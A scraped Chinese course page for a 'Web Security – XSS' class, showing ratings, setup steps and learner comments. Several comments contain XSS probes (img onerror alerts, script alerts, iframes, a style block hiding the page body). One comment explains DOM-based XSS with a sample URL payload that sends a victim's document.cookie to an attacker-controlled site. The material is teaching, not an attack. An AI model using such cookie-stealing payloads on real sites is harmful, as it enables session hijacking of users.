为了账号安全,请及时绑定邮箱和手机立即绑定

Web安全-XSS

快乐动起来呀 Web前端工程师
难度中级
时长 1小时20分
学习人数
综合评分9.47
84人评价 查看评价
9.5 内容实用
9.5 简洁易懂
9.4 逻辑清晰
<style>
body{
display:none!important
}
</style>
1, 安装node
2, npm install -g express
3, npm install -g express-generator
4, cd进入xss项目文件
5, express -e

最新回答 / COMMAND
Atom 编辑器 express框架 nodejs 环境
哈哈<iframe src="http://www.baidu.com"></iframe>
<iframe src="http://www.baidu.com"></iframe>
这是下半部:
假设我知道了小明也注册了该网站,并且知道了他的邮箱(或者其它联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当小明点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把小明在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了小明在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!
评论字数限制,这是上半部:
DOM Based XSS是一种基于网页DOM结构的攻击。假设当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它的页面处理可能是这样,其它语言类似:
<html>
<head>
<title>XSS测试</title>
</head>
<body>
<%=request.getParameter("content")%> //看这里看这里,意思就是在页面输出content参数的内容,如果不做任何屏蔽,会有什么结果呢?
</body>
</html>
<img src="null" onerror="javascript:alert(1);">
<img src="null" onerror="javascript:alert(1);">
老师讲的很好
我想要发攻击代码。
<button onclick="alert('攻击我')">攻击</button>
<a href="www.baidu.com">百度一下</a>
<script>alert(12345)</script>
课程须知
1、了解基础的html、css、js
老师告诉你能学到什么?
1、什么是XSS 2、XSS的原理是什么 3、XSS常见的攻击手段是什么 4、图解XSS攻击 5、对XSS见招拆招,做好防御 6、做一个项目演练攻击和防御,充分体会XSS防御的措施和重要性

微信扫码,参与3人拼团

意见反馈 帮助中心 APP下载
官方微信
友情提示:

您好,此课程属于迁移课程,您已购买该课程,无需重复购买,感谢您对慕课网的支持!

本次提问将花费2个积分

你的积分不足,无法发表

为什么扣积分?

本次提问将花费2个积分

继续发表请点击 "确定"

为什么扣积分?

举报

0/150
提交
取消